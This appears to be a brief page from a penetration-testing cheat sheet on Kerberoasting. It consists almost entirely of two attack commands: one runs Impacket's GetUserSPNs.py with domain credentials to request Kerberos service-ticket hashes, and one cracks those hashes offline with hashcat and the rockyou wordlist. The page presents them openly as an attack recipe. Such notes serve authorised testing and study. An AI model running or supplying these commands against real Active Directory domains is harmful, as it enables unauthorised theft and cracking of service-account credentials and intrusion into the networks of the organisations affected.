Kerberoasting

Commands

# Run GetUserSPNs.py 
sudo GetUserSPNs.py DOMAIN/USER:PASSWORD -dc-ip DC_IP_ADDRESS -request

# This will give you a hash which then you can use hashcat to attempt to crack
hashcat -m 13100 krb.txt /usr/share/wordlist/rockyou.txt

Reference: Attacking Kerberos

PreviousPass Attacks NextLNK File Attacks

Last updated 11 months ago